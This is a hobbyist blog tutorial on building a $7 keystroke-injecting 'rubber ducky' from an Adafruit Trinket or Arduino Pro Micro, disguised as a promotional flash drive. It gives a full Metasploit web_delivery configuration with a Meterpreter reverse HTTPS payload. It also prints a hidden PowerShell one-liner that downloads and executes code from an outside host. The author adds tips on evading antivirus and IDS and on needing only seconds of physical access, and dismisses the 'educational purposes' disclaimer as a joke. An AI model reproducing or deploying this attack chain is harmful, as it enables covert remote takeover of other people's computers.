Building a USB Rubber Ducky for $7

Lets start off with a stereotypical ‘This is for educational purposes only’, if you use this to pwn HBO and release the next season of GOT for free on YouTube. Nice… I mean I do not endorse any such behavior.

In case you do not know what a rubber ducky is, it is a device created by Hak5. It looks and behaves like a flash drive, but it can be programmed execute keystrokes very quickly. It can be used to compromise a system in a matter of seconds. The only downsides are that you need physical access to the machine, and they cost $50, hence the purpose of this article.

I will be using the 5V Adafruit Trinket and a micro USB cable for this, that’s about all you need.

Luckily Adafruit supplies a library for interfacing with a computer as a keyboard so the first step is to #include it. You will need to install the library following these steps.

#include <TrinketKeyboard.h>

We can play around with the library before going all in, we start by initializing the trinket as an HID device with the begin() method.

Looking good, I want to run commands on the target machine, I can do that by ‘typing’ the windows key, cmd, enter, then the command.

Looks good. Lets setup our exploit in Metasploit.

I will be using the web_delivery module documented here. I chose this due to it’s speed and low chance of triggering anti-virus. It also never writes to disk, so there won’t be anything left behind when I am finished.

We are targeting a 64 bit Windows 10 box for this, so I will choose the PowerShell target, but let’s be clear, this isn’t an exploit against PowerShell. It simply uses it to download and execute a payload from the web server.

use exploit/multi/script/web_delivery

We need to tell our payload where to download the binary from:

set LHOST 1.2.3.4

Next we set an inconspicuous port, how about 443. ;)

set LPORT 443

Metasploit will generate a random URIPATH every time, and we want to be able to use start and stop our listener whenever we like without needing to recompile the code for the Trinket.

set URIPATH /

We then need to choose Powershell as our delivery method. This exploit supports 3 targets noted by an id, 0: Python, 1: PHP, and 2: Powershell.

set TARGET 2

Now set a payload, I will use reverse_https because we are using 443 as our port. Should look like a normal connection to most IDSs.

set PAYLOAD windows/meterpreter/reverse_https

And finally exploit

To make it easy to start and stop our listener we will turn this into a configuration file: usb.rc

use exploit/multi/script/web_delivery
set LHOST 1.2.3.4
set LPORT 443
set URIPATH /
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_https
exploit

This will give us a payload to run on the target machine:

powershell.exe -nop -w hidden -c $N=new-object net.webclient;$N.proxy=[Net.WebRequest]::GetSystemWebProxy();$N.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $N.downloadstring('http://1.2.3.4:8080/');

We can now put this into our trinket.

This works pretty well, we need about 40 seconds of access to Daenerys’, I mean the target’s computer.

Because of the trinkets’ limited power, it’s boot-loader is not available all the time like a regular Arduino, you can only upload when you press the button on the trinket, or during the first 30 seconds of run-time. This means that the for 30 seconds after plugging it in we wait for the code to actually run, and then another 10 seconds for it to type the script. It would be extremely helpful to cut our required access time by 75%. This nice man edited the firmware to skip the boot-loader on power-up. We go ahead and build the firmware, then flash the trinket, re-upload the sketch and ta-da. This works well, but it could be better. Let’s make it a little more inconspicuous.

I chose an inconspicuous flash drive that recruiters hand out by the millions and ordered these neat little OTG micro usb to usb A adapters. I cut away parts of the trinket PCB to make it fit, slid the OTG adapter into the USB A casing and super glued everything into place. Looks pretty inconspicuous to me, but 10 seconds is a long time, especially when hiding from dragons.

You can order this Arduino Pro Micro off Amazon for about $10. If you are patient, you can order them off EBay for about $3 or $4. I didn’t have a USB drive large enough to fit it, so I outfitted it with an OTG adapter and some electrical tape and called it a day.

We need to alter the program a little bit because we use a different library, but the it works the same.

The biggest difference with upgrading to the Pro Micro, is it’s speed. We now only need 3 seconds of physical access. A true drive by attack. If you decide to harness this power, use it for good. Kill Cersei.

This project was of course inspired by Hak5’s USB Rubber Ducky. If you enjoyed this article, want to know more, or tell me i’m an idiot, follow me on GitHub, Twitter, or connect with me on LinkedIn.